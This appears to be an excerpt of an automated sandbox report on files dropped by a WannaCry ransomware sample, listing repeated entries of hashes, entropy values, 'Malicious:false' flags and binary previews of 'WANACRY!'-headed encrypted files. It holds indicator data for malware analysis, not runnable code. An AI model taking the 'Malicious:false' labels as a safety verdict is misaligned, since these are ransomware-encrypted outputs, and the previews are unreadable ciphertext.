                                                                              Preview:WANACRY!...........M.,7....$.yy...:.....x..w..(.ICA..l..H.%HC.....I.T..)....m`G....Y....0{..(...q.{..J.$.x..3...Lb.........O..M...p...Y..STAp...[.P.m.T;....o......q=.t.>K;.u/.........*..Ci.......e.g..........Ki[b.]...8.S..LC..........^....hV?j./....................;N.S..J.=....8n..e...Q..* .B......Q..i.]....x.=.@.+...(.7..{...{..K....s. ..Vj&C.-......OT..~...<.c......^.&?E.bV.Px......9.3..LZ.G.Rt.k.$...>...G.....@.T.....FJ..['.F...B7N........&..w.=............J=/.Ep.c..0..%A.TF....%,...Zw...&..6!m4 =.Z.v..YXDU.?..j>......X..k@x<Bu.).....y........h..6.k.....yvQk..U.5.......KjZ.s.e.SD.......*....(..Y..6,.....6:*Z.....:.H..+.QhL.]....k...\.~.......!.)..M...d..<N:7....A...b..>...'...h.} w...0W5..Y..C.{0.5D...2...=</k.^.............?!.v q.BL..t...H..?.?.SGw.7Q..Jq.s}`c...L....og.Q......}....._....3p:...;......9.sV.......3.!._.E`W.I?.Xk.&L..f....s.....W.....8..V.$`.WA".1IM.J_...X...+.....IL8..@%'f1...E..4..2.s@...../.....T.b]...._".{.J.D
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8432081495859105
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkj2/Rkp36EUwKg7lm90NXoacu9zuYDo3jWvjNF4d0mn4XWnWNZGzCpQZwBjwzz/:bkj2/zEdKMmSz9n1LuJn6ZGWpQ8jc8w
                                                                              MD5:BC0B20862C35F2E2D7457FABF29BAFFB
                                                                              SHA1:5E59DB5FAA2191E194AF97CEF1308644EFBF3317
                                                                              SHA-256:242702663D1B5DECEF54E4A6CE1D0AE12C11E1C34854B3D1BB06C37C17FB1E44
                                                                              SHA-512:F13D70F3ED9242192B88E65A57DF783F11F9C5B4EAB7D7CD70A4C982FE6B73D4331DEE56EDA2394CE6C1A5D2410B7502900AFBFF2C73DC33643FE3B44198CC15
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....<.?..D.X.C..i.W. ...I$C.M..Z....$.}FN4.{.|.].R..x.....z$..E..........V..KrI.!........*.hg........_........c..u.^G..A.....x....t..fD`.....F....v.'....b..6....W;J.'_.z1..w4.H..$...6B.....u...e.".T.!.+bP[..-._$u.bSi..G..'!..JK..zT......R..M2.....w.O.............t.l...%C....V....,A......&@!...c.8..V.M........7.g........H.~...P"..4.&S..v...U.M..6.U.cHh.[.Q.......c..Y.5.=.i.&*1.g.....RB.....Xd.ix,....@,s.J....'U...'..c8....B..T..}...y+..8..~^..!x).......~!...v.+.>.`).>......1x.'K.;...y....j.%.V5..-.q.C..02:..s.b..}.X.Q!.4i.....]..}....l.#FG.._.c.B..#...p.N&.q..#.....z..?Q....H...5........Pk...I.......;N2o.m ..W..E..B.{o.8.-\E..K....w<......Jy.`.....ED....Z....r..r..F.<.M..c;..^:}.......*.@Q.....:..> .d.mW..wk......9..Y....i....A.@0|.W..IU.%...b.......&........R.6..k.. K.8Y....P.J...R..g..W.Qw.h....H.W....|...H.......].xX&y.*S=(x5(.F$.SBK-@.|0.W.t..<|...cC..4s..D..F.jV.x..._...c........$......C...N.'[.._.L+.]9#..{.DbJ....|+d.\P.RX....L..(.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8432081495859105
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkj2/Rkp36EUwKg7lm90NXoacu9zuYDo3jWvjNF4d0mn4XWnWNZGzCpQZwBjwzz/:bkj2/zEdKMmSz9n1LuJn6ZGWpQ8jc8w
                                                                              MD5:BC0B20862C35F2E2D7457FABF29BAFFB
                                                                              SHA1:5E59DB5FAA2191E194AF97CEF1308644EFBF3317
                                                                              SHA-256:242702663D1B5DECEF54E4A6CE1D0AE12C11E1C34854B3D1BB06C37C17FB1E44
                                                                              SHA-512:F13D70F3ED9242192B88E65A57DF783F11F9C5B4EAB7D7CD70A4C982FE6B73D4331DEE56EDA2394CE6C1A5D2410B7502900AFBFF2C73DC33643FE3B44198CC15
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....<.?..D.X.C..i.W. ...I$C.M..Z....$.}FN4.{.|.].R..x.....z$..E..........V..KrI.!........*.hg........_........c..u.^G..A.....x....t..fD`.....F....v.'....b..6....W;J.'_.z1..w4.H..$...6B.....u...e.".T.!.+bP[..-._$u.bSi..G..'!..JK..zT......R..M2.....w.O.............t.l...%C....V....,A......&@!...c.8..V.M........7.g........H.~...P"..4.&S..v...U.M..6.U.cHh.[.Q.......c..Y.5.=.i.&*1.g.....RB.....Xd.ix,....@,s.J....'U...'..c8....B..T..}...y+..8..~^..!x).......~!...v.+.>.`).>......1x.'K.;...y....j.%.V5..-.q.C..02:..s.b..}.X.Q!.4i.....]..}....l.#FG.._.c.B..#...p.N&.q..#.....z..?Q....H...5........Pk...I.......;N2o.m ..W..E..B.{o.8.-\E..K....w<......Jy.`.....ED....Z....r..r..F.<.M..c;..^:}.......*.@Q.....:..> .d.mW..wk......9..Y....i....A.@0|.W..IU.%...b.......&........R.6..k.. K.8Y....P.J...R..g..W.Qw.h....H.W....|...H.......].xX&y.*S=(x5(.F$.SBK-@.|0.W.t..<|...cC..4s..D..F.jV.x..._...c........$......C...N.'[.._.L+.]9#..{.DbJ....|+d.\P.RX....L..(.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846243981182983
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkGRlLMkhiU8uoUM4epH3sCDPjvmAxDqMXir3RoBssOE5ZxqXj+veQ+cW:bkGRlwPUzobpHcI7vmAgMXi7RoBsLE5U
                                                                              MD5:18430B564B3448DDE67371CFB743583D
                                                                              SHA1:32048D96550BCA3B76074EEF28D499F602392E8C
                                                                              SHA-256:83E164FE31E9880F388F7593CAB96C2D830497C05D373460D1BC9E803F78C431
                                                                              SHA-512:BB92CA5D5F22BF3A3605C73DD63019C4E793D7D84891FF7938E6A916D3AA8CA0FDBB2C5D36647C36A75449EF5E148668C8A477245450B9E94D07340C4094ABAE
                                                                              Malicious:false
                                                                              Preview:WANACRY!........"|\T..6r.CW.[.Ff....\..eS.e........)R..K.#..L.n8%.."...G.T.qe.8j...%....P..33.q....Q....!.O.3...E.].>......L....U.gN.v.m.......3...Zm.G..g..$....T...i..dM`Na...k.-..CWv.....k..!O...c..4f.m>..[...Ojc.1d3.]...,m...._.+.....V.-....<`........AGi............S.....u.....C..ITR....S....C.oRD,.d./.Z.Z....H'.3....].0@....~.=.Wg..:...8".Z..].....#....-3.tZ.. ........j][.V.......v...{..H....z..5.q.1..s(..(A..K.....=.....7!....~..v7.>..uV,..t.x.".. T..A*.{..!.A.{>F.....|.jL(.bV.x....Q.....uN1.k..vR.Y2!B..S.Uz?.]"...d...Iu......%..2.T.-0.=ozy..G.... ...T.[.5......c..6..........2.m..`........?...*..O",5;{A"@~%.5=l.IOv...H.f..g..C.T....P)si....U..h..]...5.&..3S.Xl7dD....5A........".>.....W>.....h5.P.6........H^.\?.R..m.....Ib...k.~9a...Nz..q..>... >..,E.5.Jn......2..sQ.Y.>..u.\...D...UG..X.|..f..L....P..j.s.....P....8.=H.@[n...|.kX.y.2....%..mJpqn.5;..t.08.....R.....P.@T.....q;K'...._......m[6.WX.I.*...c...6f..].../.Y...:.&3b..t.`..P..F:.....C^.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.846243981182983
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkGRlLMkhiU8uoUM4epH3sCDPjvmAxDqMXir3RoBssOE5ZxqXj+veQ+cW:bkGRlwPUzobpHcI7vmAgMXi7RoBsLE5U
                                                                              MD5:18430B564B3448DDE67371CFB743583D
                                                                              SHA1:32048D96550BCA3B76074EEF28D499F602392E8C
                                                                              SHA-256:83E164FE31E9880F388F7593CAB96C2D830497C05D373460D1BC9E803F78C431
                                                                              SHA-512:BB92CA5D5F22BF3A3605C73DD63019C4E793D7D84891FF7938E6A916D3AA8CA0FDBB2C5D36647C36A75449EF5E148668C8A477245450B9E94D07340C4094ABAE
                                                                              Malicious:false
                                                                              Preview:WANACRY!........"|\T..6r.CW.[.Ff....\..eS.e........)R..K.#..L.n8%.."...G.T.qe.8j...%....P..33.q....Q....!.O.3...E.].>......L....U.gN.v.m.......3...Zm.G..g..$....T...i..dM`Na...k.-..CWv.....k..!O...c..4f.m>..[...Ojc.1d3.]...,m...._.+.....V.-....<`........AGi............S.....u.....C..ITR....S....C.oRD,.d./.Z.Z....H'.3....].0@....~.=.Wg..:...8".Z..].....#....-3.tZ.. ........j][.V.......v...{..H....z..5.q.1..s(..(A..K.....=.....7!....~..v7.>..uV,..t.x.".. T..A*.{..!.A.{>F.....|.jL(.bV.x....Q.....uN1.k..vR.Y2!B..S.Uz?.]"...d...Iu......%..2.T.-0.=ozy..G.... ...T.[.5......c..6..........2.m..`........?...*..O",5;{A"@~%.5=l.IOv...H.f..g..C.T....P)si....U..h..]...5.&..3S.Xl7dD....5A........".>.....W>.....h5.P.6........H^.\?.R..m.....Ib...k.~9a...Nz..q..>... >..,E.5.Jn......2..sQ.Y.>..u.\...D...UG..X.|..f..L....P..j.s.....P....8.=H.@[n...|.kX.y.2....%..mJpqn.5;..t.08.....R.....P.@T.....q;K'...._......m[6.WX.I.*...c...6f..].../.Y...:.&3b..t.`..P..F:.....C^.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.834197775552443
                                                                              Encrypted:false
                                                                              SSDEEP:24:bks7rGtrX3xeWjzBJmqpBydyNBe/bpKdzS9L237AjrI4DOkJrRwda3kL:bks7rGtD3xJjzBJmqidyfe/bYZMK37Ag
                                                                              MD5:D2261F18EB40B06F418C318CCA9A27D4
                                                                              SHA1:8090381D6E375AD0B3A83376F476E1E191EDADF3
                                                                              SHA-256:6325C1023B8C86FEC321DC30A412BCD6B830EB5C1A24204AB1ED20A095B3F50D
                                                                              SHA-512:1E98615869BC93C9FBA0873801DB3BA4826BC31509404B7A2D1C9C44870711579C135E48541F81FD15303ACD7C1F39201CA0689593C65B44022829513B47490D
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......x.].......2.AXaH%8'....\.u.4....).'..+...0..._.).......D.LW7...4......H?z0....7d..t........;...X`.G...-G}u:....{.o.zV2izD....8.us..U.Z.k..;.....Nbs';'....l.).@...#`.#\N.|/..G..=...\=..P./.s.q.."...Q.r....'u)W(.M.E7.S....... ..f..A..*../..PlAr.............L...RN.W.4...eM..*..|SO.#@..<F0...s.......h.........`..h..`.Q...?.d.....E.......$.B...Z.C........dF.....:M.../..QZ.....t<..'h6....."....g..If....J...<%(....Q...TTI..)k(.o.WI..!;m;.&..$.527..$Ydmk....C...@.)......C.i....Ha@. o.f...... ...q..H.nW.b...A;J..........c.26&.t...1..k.O....?W.r....tya.!.......sn.}x...7W..t_/J.%.8.T..:....!.M......09g%.....u_..ShA..j....U..AQ~..n.Z.t....O-..:~..@c..w.S.2O...1HE..V.&2LS..].........R...Yo'......2.g...Hx.........].]j.Be.7....z.[W..:l..p..l[k>..H....p...0..._CE.#.s....}..k.....Y.B..F.H..L|.-.T.."C-..9...o.......P..>.P....l.^.s&@O....m.n..n...z....^Q. `Z.T.u....-.3..|HV.}._...y......M.iO...}......R9...1..q.=l.}.u...F.XE...QH....^.-7...ES.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.834197775552443
                                                                              Encrypted:false
                                                                              SSDEEP:24:bks7rGtrX3xeWjzBJmqpBydyNBe/bpKdzS9L237AjrI4DOkJrRwda3kL:bks7rGtD3xJjzBJmqidyfe/bYZMK37Ag
                                                                              MD5:D2261F18EB40B06F418C318CCA9A27D4
                                                                              SHA1:8090381D6E375AD0B3A83376F476E1E191EDADF3
                                                                              SHA-256:6325C1023B8C86FEC321DC30A412BCD6B830EB5C1A24204AB1ED20A095B3F50D
                                                                              SHA-512:1E98615869BC93C9FBA0873801DB3BA4826BC31509404B7A2D1C9C44870711579C135E48541F81FD15303ACD7C1F39201CA0689593C65B44022829513B47490D
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......x.].......2.AXaH%8'....\.u.4....).'..+...0..._.).......D.LW7...4......H?z0....7d..t........;...X`.G...-G}u:....{.o.zV2izD....8.us..U.Z.k..;.....Nbs';'....l.).@...#`.#\N.|/..G..=...\=..P./.s.q.."...Q.r....'u)W(.M.E7.S....... ..f..A..*../..PlAr.............L...RN.W.4...eM..*..|SO.#@..<F0...s.......h.........`..h..`.Q...?.d.....E.......$.B...Z.C........dF.....:M.../..QZ.....t<..'h6....."....g..If....J...<%(....Q...TTI..)k(.o.WI..!;m;.&..$.527..$Ydmk....C...@.)......C.i....Ha@. o.f...... ...q..H.nW.b...A;J..........c.26&.t...1..k.O....?W.r....tya.!.......sn.}x...7W..t_/J.%.8.T..:....!.M......09g%.....u_..ShA..j....U..AQ~..n.Z.t....O-..:~..@c..w.S.2O...1HE..V.&2LS..].........R...Yo'......2.g...Hx.........].]j.Be.7....z.[W..:l..p..l[k>..H....p...0..._CE.#.s....}..k.....Y.B..F.H..L|.-.T.."C-..9...o.......P..>.P....l.^.s&@O....m.n..n...z....^Q. `Z.T.u....-.3..|HV.}._...y......M.iO...}......R9...1..q.=l.}.u...F.XE...QH....^.-7...ES.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8372895950658235
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8L/nI6Q9QNbIe0Gp9Hh5heAmaS/c7DF38YmyGPrBXcs9mP03r27U3XgFa+y:bkkFoQC5GfHh5hBS0qTyGV9mPOtXY5y
                                                                              MD5:249FC0CF49A235693F205B4AEF3401FE
                                                                              SHA1:EDB33C370CBECF54917B40465C6DBEB33E48077E
                                                                              SHA-256:815D57B283A2C88FD208BFF5F2E70A7C06B0A9989C6BF6FC8BA8EAF0EBB2442B
                                                                              SHA-512:EF82C53D51D54E8D3D2B16D3E8031FB70D2640E31B1A7022E0BCD61732C10BFA01EF066149AF0B2AC433E6EAFB249CF8EF65A25B948F7F99170AD93351B901E7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......5..m.... v...Fw.}..(s..._...{.....)...Q.)..v.yq.....9..Y!ew..S.b..".Uf..........P..M.:..`TSa...n..K'.I{D..u.m....y...).pP`..u\......AV...........j.x.p-...C..E...w].0/.3g.."..z...-.*..LG...h..."..).a.PBO'...#.....y...^....?`..g.}...&h................:.E.w.Avn....f...&.L..}[)..0d6Z$.........C..]..y..8...TZq._.`..P]g..B.m|".9........$.E.U.$..jh.....=..>.~..I.C<IN......B......%......h..~g..K....~E...k..W.c..=...1..<<QA..V.......]S.`...8Q.>.gCp.hm....<........0V.=c>..G..^.d.w...4..f^fL'~<..G.W+...OG9....FJ..A....Y...bc....Oh.1%....!s(.d...\......t....;\...j..3..%..j.->..D........z ..2..q...t4.r..}..Hy..w..{.W.4...Z>p..P.m}....(.m..Z..QF.x...w......X..N...G>.3..N........?..D%k(}?..-.^.S...qp..Kc.M..S..[.{}....1....P....A....Ms...x...T..ZT,7.`..0.sW..L.~E@.CTGe..I.....g....].V.kD..kZ./LZ.7..q.(..my.$.)_....4@N..@..~.-.M4<0.dW........39/"^<..v.\..!..3..|..xU...:......H.Qq%.5.nP).'...i..R%..Sj....jH...x..s.4...A.y3.....E..c.f.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8372895950658235
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8L/nI6Q9QNbIe0Gp9Hh5heAmaS/c7DF38YmyGPrBXcs9mP03r27U3XgFa+y:bkkFoQC5GfHh5hBS0qTyGV9mPOtXY5y
                                                                              MD5:249FC0CF49A235693F205B4AEF3401FE
                                                                              SHA1:EDB33C370CBECF54917B40465C6DBEB33E48077E
                                                                              SHA-256:815D57B283A2C88FD208BFF5F2E70A7C06B0A9989C6BF6FC8BA8EAF0EBB2442B
                                                                              SHA-512:EF82C53D51D54E8D3D2B16D3E8031FB70D2640E31B1A7022E0BCD61732C10BFA01EF066149AF0B2AC433E6EAFB249CF8EF65A25B948F7F99170AD93351B901E7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......5..m.... v...Fw.}..(s..._...{.....)...Q.)..v.yq.....9..Y!ew..S.b..".Uf..........P..M.:..`TSa...n..K'.I{D..u.m....y...).pP`..u\......AV...........j.x.p-...C..E...w].0/.3g.."..z...-.*..LG...h..."..).a.PBO'...#.....y...^....?`..g.}...&h................:.E.w.Avn....f...&.L..}[)..0d6Z$.........C..]..y..8...TZq._.`..P]g..B.m|".9........$.E.U.$..jh.....=..>.~..I.C<IN......B......%......h..~g..K....~E...k..W.c..=...1..<<QA..V.......]S.`...8Q.>.gCp.hm....<........0V.=c>..G..^.d.w...4..f^fL'~<..G.W+...OG9....FJ..A....Y...bc....Oh.1%....!s(.d...\......t....;\...j..3..%..j.->..D........z ..2..q...t4.r..}..Hy..w..{.W.4...Z>p..P.m}....(.m..Z..QF.x...w......X..N...G>.3..N........?..D%k(}?..-.^.S...qp..Kc.M..S..[.{}....1....P....A....Ms...x...T..ZT,7.`..0.sW..L.~E@.CTGe..I.....g....].V.kD..kZ./LZ.7..q.(..my.$.)_....4@N..@..~.-.M4<0.dW........39/"^<..v.\..!..3..|..xU...:......H.Qq%.5.nP).'...i..R%..Sj....jH...x..s.4...A.y3.....E..c.f.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837338785808748
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkhlZ+MQw3Q3nSxbu7inv8rNuC0TajbqFjPccPaEs9HpqZJnEEp8/5:bkhdQwgiRfvWYPu6ccPa59HpgEzh
                                                                              MD5:FE8A7C7B10062DA452ABDB052C9BC9E8
                                                                              SHA1:FF033BD98BBC4239464362AFEFCAC6AF6E046186
                                                                              SHA-256:3D4B5B73588584F691604B50585D13E57DC6719A566D884554BBAD89E45BC0CC
                                                                              SHA-512:D5E5B6E5D657EFD4E3FE6E1BB496CA841E58BE59A05271425D06BACBBB7D34BBBD582E87DD91A2E267893778E74398D71A60FB927E5DCBD159B23C7E4AD40F42
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....'.(.r..Q./.~.P.B.`.nP.........Y............3]....h.2....c...V..){..y.2.._.{....\...|.bW......U...D\C?kLd.9.X."$..f...9..F.m...V........L.d....r.vi..Y...xc......A..;a.}|Z|t.;...=...n......7...}-4....W.^.`\..t...s..5[....S.[..97..DcS....0.............$....5_.W...RmKW/.cM.S$&[.O.y..qda4...X/.6.....v......&n.U.m.P.VG.(..v(.....z....2..e.a..1..c.....}.~.4..S.:9......#I...ce,......a5+.Z....j...V.........K.....#....W.....1.3..H.-...d.A/-...7G.2......E...2.S.=;.......X.TzL.r@....N\Wg..'CM....c.D.)......6R5.5..:..X...M....F.C".....b(...V5..[.v .^q../o.{.E.4.....1..........&..Q..........3%-.....^|......][}d.HN.......N.f.W.......g.N..e...^.e.........i.ZtM.?B...t...p..8.. ..P.....xo.N.'.Tf......... ......k/.E..\.5|6>;%....q.4.W..s....Nh...2>."Z..7.Q.h..5....F...F@9..\..;...P....tb.$.x..p}.k...&...~.6/..4....DgE..6.|S..T..V.RD...w......x.F......U..I;....!@...Ib.9......\..]yBQ.vB.UX...N.o../.og..bmK....!'.,.r>..CX..N.....%..^Gn......*
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837338785808748
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkhlZ+MQw3Q3nSxbu7inv8rNuC0TajbqFjPccPaEs9HpqZJnEEp8/5:bkhdQwgiRfvWYPu6ccPa59HpgEzh
                                                                              MD5:FE8A7C7B10062DA452ABDB052C9BC9E8
                                                                              SHA1:FF033BD98BBC4239464362AFEFCAC6AF6E046186
                                                                              SHA-256:3D4B5B73588584F691604B50585D13E57DC6719A566D884554BBAD89E45BC0CC
                                                                              SHA-512:D5E5B6E5D657EFD4E3FE6E1BB496CA841E58BE59A05271425D06BACBBB7D34BBBD582E87DD91A2E267893778E74398D71A60FB927E5DCBD159B23C7E4AD40F42
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....'.(.r..Q./.~.P.B.`.nP.........Y............3]....h.2....c...V..){..y.2.._.{....\...|.bW......U...D\C?kLd.9.X."$..f...9..F.m...V........L.d....r.vi..Y...xc......A..;a.}|Z|t.;...=...n......7...}-4....W.^.`\..t...s..5[....S.[..97..DcS....0.............$....5_.W...RmKW/.cM.S$&[.O.y..qda4...X/.6.....v......&n.U.m.P.VG.(..v(.....z....2..e.a..1..c.....}.~.4..S.:9......#I...ce,......a5+.Z....j...V.........K.....#....W.....1.3..H.-...d.A/-...7G.2......E...2.S.=;.......X.TzL.r@....N\Wg..'CM....c.D.)......6R5.5..:..X...M....F.C".....b(...V5..[.v .^q../o.{.E.4.....1..........&..Q..........3%-.....^|......][}d.HN.......N.f.W.......g.N..e...^.e.........i.ZtM.?B...t...p..8.. ..P.....xo.N.'.Tf......... ......k/.E..\.5|6>;%....q.4.W..s....Nh...2>."Z..7.Q.h..5....F...F@9..\..;...P....tb.$.x..p}.k...&...~.6/..4....DgE..6.|S..T..V.RD...w......x.F......U..I;....!@...Ib.9......\..]yBQ.vB.UX...N.o../.og..bmK....!'.,.r>..CX..N.....%..^Gn......*
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837014357549142
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkXrPRz0yFIH3m+lp+sVR641mo2e20AJ7K6R15Kbt5sWavzdM9m8F5hcM/VO+AXn:bkXTRz0yFIHssV71mrsAK6JG2WaLdMwN
                                                                              MD5:9E371BAD46264CD84D19F5C48EDEC900
                                                                              SHA1:4592E1D6EC03D215781992182191B019A11F6376
                                                                              SHA-256:8E987301011F4FBD9137541F20DEFFEEE806AC1B5FCBE073C47EF8C78C86E701
                                                                              SHA-512:2405DFAE38AC678242CA64946194BCF000CE5BCDE0A9ECE9C50DBE6098D5F7E215BE7C682010CFB646E3C1D3A94F88AA3C714C42AED8CACB695D883D915336C1
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........7.;rX.PdUr..jp.l..c..n......U.0.....].$.:.X..B\.....4) b....;.4.=h.q"..T.m..I.%[.G?_...:....?....db.>.........Dq.s...Z!C..../g.......^.j..Q ..}....nE...p....x...m.t.......V..........?...9./..V.oC.j....y.9..=....*.,....l.r..$.&.a...............y...JiOF]...ln .aY....g.j...\)..#j6B.p|...",E..ME..c.....^..7....'.0..w.........#.iN.. ...Fy..W...v...b..*...b2W)'....%.......W.h.p.>D..D....&(.>...3.....fi.-).)=...W.6...48'...pAJ..q.d.v.....g.......)O..D....9..h....)=g)..F..'..A...<..|..E...ya..[.....Q........eOj.&.....4h.j..Rt...?.........=.O..8C.J.L.Z..1I)t,T+..]A./@pq..L..H.#o.2..).Tr.j.&.....68...U......I8..3.6Yh..e.7.d59<...c.....f...<....._....J....Y......g.D....Z.,5.=.7..'.n.#..N..;c..a..T.....B.L...$.hLn..........h.U........../.G..z...;4..+.*Z>.2Q....s..f.....?#T...1.u..H.Ks.7o.i.......sj..G.0...?.....n..nM..V/T.v.p.......=.5*6....]f...g./.7....|=T".......d{:...2..2@].;.....bXx.q...e.....s.D.z ...`g.........>'..5.3W.u..~
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.837014357549142
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkXrPRz0yFIH3m+lp+sVR641mo2e20AJ7K6R15Kbt5sWavzdM9m8F5hcM/VO+AXn:bkXTRz0yFIHssV71mrsAK6JG2WaLdMwN
                                                                              MD5:9E371BAD46264CD84D19F5C48EDEC900
                                                                              SHA1:4592E1D6EC03D215781992182191B019A11F6376
                                                                              SHA-256:8E987301011F4FBD9137541F20DEFFEEE806AC1B5FCBE073C47EF8C78C86E701
                                                                              SHA-512:2405DFAE38AC678242CA64946194BCF000CE5BCDE0A9ECE9C50DBE6098D5F7E215BE7C682010CFB646E3C1D3A94F88AA3C714C42AED8CACB695D883D915336C1
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........7.;rX.PdUr..jp.l..c..n......U.0.....].$.:.X..B\.....4) b....;.4.=h.q"..T.m..I.%[.G?_...:....?....db.>.........Dq.s...Z!C..../g.......^.j..Q ..}....nE...p....x...m.t.......V..........?...9./..V.oC.j....y.9..=....*.,....l.r..$.&.a...............y...JiOF]...ln .aY....g.j...\)..#j6B.p|...",E..ME..c.....^..7....'.0..w.........#.iN.. ...Fy..W...v...b..*...b2W)'....%.......W.h.p.>D..D....&(.>...3.....fi.-).)=...W.6...48'...pAJ..q.d.v.....g.......)O..D....9..h....)=g)..F..'..A...<..|..E...ya..[.....Q........eOj.&.....4h.j..Rt...?.........=.O..8C.J.L.Z..1I)t,T+..]A./@pq..L..H.#o.2..).Tr.j.&.....68...U......I8..3.6Yh..e.7.d59<...c.....f...<....._....J....Y......g.D....Z.,5.=.7..'.n.#..N..;c..a..T.....B.L...$.hLn..........h.U........../.G..z...;4..+.*Z>.2Q....s..f.....?#T...1.u..H.Ks.7o.i.......sj..G.0...?.....n..nM..V/T.v.p.......=.5*6....]f...g./.7....|=T".......d{:...2..2@].;.....bXx.q...e.....s.D.z ...`g.........>'..5.3W.u..~
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.86227957477026
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkKg7D9jgWnJr/8HISzpQRmCTLFXr/7++/LxOQhECvZwJHUTfOT:bkKgn9jHJQHvVQMCd++/LoQi9UTf0
                                                                              MD5:BD3F68DF972BF92DAF18272117C57F20
                                                                              SHA1:8B85A26A4FAF5B7298E107DD7F6A5ACBB6FC903A
                                                                              SHA-256:63CB078A8D4B1F793BA9300FC8F5CA563C6303BB8F507195EF781F571393E602
                                                                              SHA-512:C679ABAFC8F6A7D5B403DF30A778A9F4F9D6756854812515078A64CB388AA86A2520931F0C9BAC577A790831A028A66257143E925AC1389B79B437473D151997
                                                                              Malicious:false
                                                                              Preview:WANACRY!......m..w..,...9.yp...E.V..f.gL]d..@.Z....O.D.r.&B.....;l.v.....|..i_....q.3Q...]w(y..Y.1....W.....o.....j./......;,.=_u........K....zre_.>.@QF..5.T.....SJ.`..+..VT.-..).........*x....C:.....V1`%.}.y.E...i....DhF-.7...s.....J......2...|./A...$v...e.0............d.J.i..4.v..;.]..8.D.2~........ms.u....M.;.^.jaq.l..:.......(.6.O...u.....UT..]N..Ng.)].Q...o..P;6,|...?$v.Jx..6..;.A.K.....(./M...;;f.x......fJRlr..R.^...Gh?._u.H.+...:T{[..u2..x..iy..p.~am.%z...b.l[.\...F.b2!?.w........la&....>.8Q..8a...BV......fU...m..S......bn..R.L.Y.n....(K..D&kw..7..r.._#%.@I?$....T.M..G<.G-g~..........(Vg*:6.J.........^......dW..e..bFE..YzN(:...B...SG......g.r.......)..+.._d$.6..eUM.z.H:....F.S.,.]....>...^.Az2..R.k..|.E.I_L...-.<A.2.ko[z.q;g.<!L..Q..............7.....X[.L.....R.!..s0.{X4Y.#."F.Yn.aC.!S!.N5.\.}b6.:.r..7dh.B...!?......#)n..K...Gl.s.......z .ty..J......jz...V...H10....c.(.](......J...,.A.".$.+.b.O.>..eV........t..7i..(....S...K..V..~uv....c.;.7O
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.86227957477026
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkKg7D9jgWnJr/8HISzpQRmCTLFXr/7++/LxOQhECvZwJHUTfOT:bkKgn9jHJQHvVQMCd++/LoQi9UTf0
                                                                              MD5:BD3F68DF972BF92DAF18272117C57F20
                                                                              SHA1:8B85A26A4FAF5B7298E107DD7F6A5ACBB6FC903A
                                                                              SHA-256:63CB078A8D4B1F793BA9300FC8F5CA563C6303BB8F507195EF781F571393E602
                                                                              SHA-512:C679ABAFC8F6A7D5B403DF30A778A9F4F9D6756854812515078A64CB388AA86A2520931F0C9BAC577A790831A028A66257143E925AC1389B79B437473D151997
                                                                              Malicious:false
